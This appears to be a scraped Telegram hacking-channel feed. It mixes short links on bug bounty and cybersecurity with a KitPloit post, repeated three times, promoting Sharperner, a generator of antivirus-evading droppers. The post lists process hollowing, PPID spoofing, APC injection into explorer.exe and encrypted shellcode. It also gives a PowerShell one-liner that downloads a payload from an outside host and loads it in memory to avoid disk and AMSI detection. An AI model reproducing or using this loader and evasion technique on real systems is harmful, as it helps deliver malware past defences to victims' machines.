Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Install haktrails on Kali Linux

haktrails : (subdomain) recon tool for bug bounty.Continue reading on Medium »
Read more...
Introducing Bug Bounty Program for Oraichain and its ecosystem

Oraichain recognizes the community’s value in bringing security and completeness to Oraichain and its ecosystem. We welcome and seek to…Continue reading on Oraichain »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Introduction to CyberSecurity

https://cdn-images-1.medium.com/max/1414/1*tRaJ7fLcKVry3i2JHVUVXg.png
Cybersecurity is one of the most demanding fields right now. Many students got fascinated by seeing bug bounty, OSCP, and many other posts…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Получи биткоин за разгадку шифра KNADAF/5

https://cdn-images-1.medium.com/max/1080/1*5fE0oyPmg1VT3t2EV-6_5Q.jpeg
Всем привет! вот такое сообщение бороздит просторы нашего русскоязычного сегмента интернета. Казалось бы, зачем это кому-то просто так…

Continue reading on Medium »
hacking: security in practice
Privacy protection

Hi, Need to know if I can remain anonymous/untraceable on my cell phone while using social media.

submitted by /u/eik_bunjara
[link] [comments]
Sharperner is a tool written in CSharp that generate .NET dropper (https://www.kitploit.com/search/label/Dropper) with AES (https://www.kitploit.com/search/label/AES) and XOR obfuscated shellcode. Generated executable can possibly bypass signature check but I cant be sure it can bypass heuristic scanning.
Features

PE binary
Process Hollowing PPID Spoofing Random generated AES key and iv Final Shellcode, Key and IV are translated to morse code :)
.NET binary
AES + XOR encrypted shellcode APC Process Injection (https://www.kitploit.com/search/label/Injection) (explorer.exe) Random function names Random generated AES key and iv Final Shellcode, Key and IV are translated to morse code :)
Usage
/file B64,hex,raw shellcode
/type cs,cpp
/out Output file Location (Optional)

Example:
Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe

Suggestion
To avoid touching the disk, Generated .NET executable can be loaded reflectively with powershell. AMSI (https://www.kitploit.com/search/label/AMSI) is the enemy now, amsi.fail (https://amsi.fail/) ftw! $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/payload.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[TotallyNotMal.Program]::Main()

Download Sharperner (https://github.com/aniqfakhrul/Sharperner)
Sharperner - Simple Executable Generator With Encrypted Shellcode

Sharperner is a tool written in CSharp that generate .NET dropper with AES and XOR obfuscated shellcode. Generated executable can possibly bypass signature check but I cant be sure it can bypass heuristic scanning.Features PE binary Process Hollowing PPID Spoofing Random generated AES key and iv Final Shellcode, Key and IV are translated to morse code :) .NET binary AES + XOR encrypted shellcode APC Process Injection (explorer.exe) Random function names Random generated AES key and iv Final Shellcode, Key and IV are translated to morse code :) Usage /file B64,hex,raw shellcode/type cs,cpp/out Output file Location (Optional)Example:Sharperner.exe /file:file.txt /type:cppSharperner.exe /file:file.txt /out:payload.exe Suggestion To avoid touching the disk, Generated .NET executable can be loaded reflectively with powershell. AMSI is the enemy now, amsi.fail ftw! $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/payload.exe')$assem = System.Reflection.Assembly::Load($data)TotallyNotMal.Program::Main() Download Sharperner
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Sharperner - Simple Executable Generator With Encrypted Shellcode

https://1.bp.blogspot.com/-y2RPsgnsqeI/YN5nW35YUaI/AAAAAAAAfkQ/aQ1UEc6pFB8TURAOCPLlk9pkORoyfweXQCNcBGAsYHQ/w640-h613/Sharperner_1_scan.png
Sharperner is a tool written in CSharp that generate .NET dropper with AES and XOR obfuscated shellcode. Generated executable can possibly bypass signature check but I cant be sure it can bypass heuristic scanning.
Features

PE binary

* Process Hollowing
* PPID Spoofing
* Random generated AES key and iv
* Final Shellcode, Key and IV are translated to morse code :)

.NET binary

* AES + XOR encrypted shellcode
* APC Process Injection (explorer.exe)
* Random function names
* Random generated AES key and iv
* Final Shellcode, Key and IV are translated to morse code :)

Usage

/file B64,hex,raw shellcode
/type cs,cpp
/out Output file Location (Optional)

Example:
Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe


Suggestion

To avoid touching the disk, Generated .NET executable can be loaded reflectively with powershell. AMSI is the enemy now, amsi.fail ftw!

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/payload.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[TotallyNotMal.Program]::Main()

Download Sharperner